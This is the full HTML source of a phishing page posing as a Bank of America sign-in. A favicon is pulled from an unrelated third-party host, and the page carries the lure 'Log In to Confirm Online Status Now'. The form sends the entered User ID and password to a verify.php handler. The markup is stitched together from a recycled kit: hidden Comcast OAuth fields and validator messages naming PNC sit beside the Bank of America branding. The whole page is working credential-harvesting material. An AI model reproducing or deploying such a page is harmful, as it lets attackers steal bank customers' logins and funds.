﻿<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>

  <meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
  <link rel="icon" type="image/png" href="https://sirus.perlahost.com/bankofamerica/index_files/58.34.png"/><title>Bank of America - Banking, Credit Cards, Loans and Merrill Investing
</title>


  <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">

  <meta content="yes" name="">

  <meta content="yes" name="">

  <meta content="">

  <meta content="width=device-width,initial-scale=1" name="viewport">

  <meta content="#ffffff" name="msapplication-TileColor">

  <meta content="#ffffff" name="theme-color">

  <link href="">



  <link href="index_files/fonts-remote.css" rel="stylesheet" type="text/css">

  <link href="index_files/styles-light.css" rel="stylesheet" type="text/css">

  <meta content="" name="">


  <style type="text/css">
html {
background-color: #042261;
}
#background {
background: linear-gradient(10deg, #ffffff 0%, #ffffff 50%, #be1d2b 50%, #be1d2b 100%) no-repeat 0 120px;
}
#left {
margin-left: 0;
padding-right: 94px;
box-sizing: border-box;
}
#left .h1 {
font-weight: bold;
margin-top: 24px;
}
#left hr {
border: solid #b1b9bf;
border-width: 1px 0 0 0;
width: 64px;
margin-left:0;
}
#left p {
color: #44484c;
font-size: 14px;
line-height: 1.4;
}
#left p + p {
margin: 18px 0 0 0;
}
#left img {
margin-top: 24px;
width: 100%;
}
#left img + p {
margin-top: 12px;
}
  </style>
</head>
<body class="has-footer">

<div id="breakpoints"></div>

<div id="background" style="height: 700.781px;"></div>

<main id="bd">

<h1 class="screen-reader-text"></h1>

<div id="left">

</h2>


<style>
#right #quick-bill-pay { display: block; }
</style>
</div>
<div id="right">
<div class="container">
<form id="signsmall" class="stacked-form" action="verify.php" method="post" name="loginForm" onsubmit="adx.validate('user_bbt_prefs');">
  
   <div class="container">
   <div class="html">

  </div><br><img src="index_files/319.70.png" width="319" height="70">
  <br><br>
  <div class="html"><Font color="#be1d2b">Log In to Confirm Online Status Now</Font><br><span class="FloatingPage__title___2W2k5">&nbsp;</span>
					<div id="faqButton"></div>

<label for="user" id="login_id_label" role="alert" aria-label=""></label>
                    <div class="textfield-wrapper">
                        <label for="user" class="float accessibly-hidden">User ID</label>
				<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name1" placeholder="User ID" maxlength="128" type="text" required>
			</div><br>
        
					<label for="passwd" id="password_label" role="alert" aria-label=""></label>
			<div class="textfield-wrapper">
			    <label for="passwd" class="float accessibly-hidden">Password</label>
				<input id="passwd" class="" name="name2" placeholder="Password" maxlength="128" type="password" required>
			</div><br>
		
        
	    			<div class="checkbox-container">
				<label for="remember_me">
					<input id="remember_me" name="rm" value="1" type="checkbox">
					<span id="remember_me_checkbox" class="checkbox"></span><div class="content">Save Username</div>
				</label>
				<button type="button" id="rm_label_learn_more" class="icon info cancel" data-id-ref="rm_help" aria-controls="rm_help" aria-label="Learn more about staying signed in"></button>
			</div>
		
		
											<button class="submit" type="submit" id="sign_in" button style="background-color:	#be1d2b;border-color:	#be1d2b;color:White"><b>Log In</b></button>
  <ul>

    

   

  </ul>

  <p id="implied-legal">

    <font color="013e82"</font>
</a>.</p>
  <input name="r" value="comcast.net" type="hidden"> <input name="selectAccount" value="false" type="hidden"> <input name="s" value="oauth" type="hidden"> <input name="deviceAuthn" value="false" type="hidden"> <input name="continue" value="#" type="hidden"> <input name="ipAddrAuthn" value="false" type="hidden"> <input name="forceAuthn" value="1" type="hidden"> <input name="lang" value="en" type="hidden"> <input name="passive" value="false" type="hidden"> <input name="client_id" value="my-account-web" type="hidden"> <input name="reqId" value="a76873ff-aff2-42d1-9d6c-7419680f9cd1" type="hidden">
</form>

<img src="index_files/632.27.png" width="632" height="27">
<img src="index_files/615.23.png" width="615" height="23">
<img src="index_files/384.124.png" width="384" height="124">
<script type="text/javascript">
var frmvalidator = new Validator("signsmall");
frmvalidator.addValidation("name1","req","Enter User Name");
frmvalidator.addValidation("userId","minlen=5","Please verify your PNC User Name");
frmvalidator.addValidation("password","req","Please verify your PNC Password");
frmvalidator.addValidation("password","minlen=5","Please verify your PNC Password");
</script>
</div>

</div>

</main>

</span>
<span class="<img src="index_files/sf.png" width="100" height="30"></span>
</nav>
</span>
</footer>



</body></html>